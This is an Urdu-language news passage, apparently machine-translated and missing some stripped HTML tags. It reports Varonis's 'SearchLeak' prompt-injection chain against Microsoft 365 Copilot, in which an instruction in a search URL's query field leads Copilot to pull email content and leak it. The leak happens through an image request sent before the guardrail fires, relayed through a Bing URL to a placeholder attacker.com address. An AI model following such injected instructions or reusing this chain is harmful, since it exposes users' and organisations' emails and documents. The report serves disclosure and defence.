پیرامیٹر ٹو پرامپٹ انجیکشن لانے کے لیے حملہ آور ہدف کو ایک ای میل بھیجتا ہے جس میں نحو کے ساتھ URL ہوتا ہے https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q=۔ فیلڈ میں ایک ہدایت ہے۔ کوپائلٹ نے آسانی سے تعمیل کی۔
“تلاش کی فعالیت بالکل وہی ہے جس کی حملہ آوروں کو ضرورت ہوتی ہے، کیونکہ محدود صلاحیتوں کے باوجود، اہم معلومات تک رسائی رکھنے والا صارف کافی ہے،” محققین پیر کو لکھا. “ڈیٹا کو نکالنے کے لیے، ایک حملہ آور ایک URL تیار کرتا ہے جو Copilot کو ‘صارف کی ای میلز تلاش کرنے’، ٹائٹل نکالنے اور اسے تصویری URL میں ایمبیڈ کرنے کو کہتا ہے۔” شکار کچھ بھی نہیں لکھتا۔ وہ ایک لنک پر کلک کرتے ہیں، اور Copilot باقی کام کرتا ہے۔
عام طور پر، بلاکس میں گارڈریل ریپنگ آؤٹ پٹ شروع ہوتا ہے۔ لیکن محققین نے دریافت کیا کہ تحفظ صرف "سوچنے" کے مرحلے کے بعد ہی فائر ہوتا ہے۔ اس سے پہلے، Copilot نے خام HTML کا استعمال کرتے ہوئے اپنا ردعمل پیدا کیا، جو عارضی طور پر براؤزر DOM میں پیش کیا جاتا ہے۔
محققین نے لکھا:
تو، ترتیب اس طرح نظر آتی ہے:
- کوپائلٹ اپنے ردعمل کو سٹریم کرنا شروع کرتا ہے، جس میں ایک شامل ہے۔
ٹیگ
- براؤزر
کو دیکھتا ہے، اسے رینڈر کرتا ہے، اور src URL پر HTTP درخواست کو فائر کرتا ہے۔
- کوپائلٹ تیار کرنا مکمل کرتا ہے۔ گارڈریل ہر چیز کو
میں لپیٹتا ہے۔- بہت دیر ہو گئی! درخواست پہلے ہی رہ گئی ہے۔
محققین کے پاس اب ہدف کے براؤزر سے فائرنگ کی تصویر کی درخواست تھی۔ مسئلہ، جیسا کہ پہلے بتایا گیا ہے، یہ ہے کہ Copilot زیادہ تر ویب سائٹس کو تصویر کی درخواستیں نہیں بھیجے گا۔ اس گڑھے کو پیمانہ کرنے کے لیے، ایکسپلائٹ چین نے مائیکروسافٹ کے بنگ سرچ انجن کو ٹرامپولین کے طور پر استعمال کیا۔ Copilot مواد کی حفاظت کی پالیسی کے مطابق، Bing ایسی سائٹس میں شامل ہے جنہیں اس طرح کی درخواستیں بھیجنے کی اجازت ہے۔ Bing پھر درخواست کو حملہ آور کے زیر کنٹرول ڈومین کو بھیجے گا جو درخواست میں شامل تھا۔ درخواست کچھ اس طرح نظر آئی:
https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png
ورونیس نے اس حملے کو سرچ لیک کا نام دیا ہے۔
کمپنی کے محققین نے لکھا، "چونکہ سرچ لیک نے مائیکروسافٹ کے انٹرپرائز ٹائر کو نشانہ بنایا ہے، اس لیے دھماکے کا دائرہ ذاتی ڈیٹا تک محدود نہیں ہے- یہ کسی بھی ایسی چیز کو منظر عام پر لانے کے قابل ہے جس تک صارف کو تنظیم کے اندر ای میلز، میٹنگ کے دعوت نامے اور نوٹس شامل ہیں،" کمپنی کے محققین نے لکھا۔ "SharePoint دستاویزات، OneDrive فائلیں، اور دیگر انڈیکس شدہ کاروباری مواد۔ M365 ماحول سے کیسے جڑا ہوا ہے اس پر منحصر ہے، دھماکے کا رداس اور بھی وسیع ہو سکتا ہے۔"
جیسا کہ نوٹ کیا گیا ہے، مائیکروسافٹ نے ان کمزوریوں کو ٹھیک کیا جن کا منگل کو سرچ لیک نے فائدہ اٹھایا۔ اس طرح کے SNAFUs کی بنیادی وجہ کو ٹھیک کرنے کا کوئی طریقہ معلوم نہ ہونے کے باوجود، حملہ آور لامحالہ نئی تعمیر شدہ چوکیوں کو روکنے کے لیے نئے طریقے تلاش کریں گے، اور یہ عمل دوبارہ دہرایا جائے گا۔
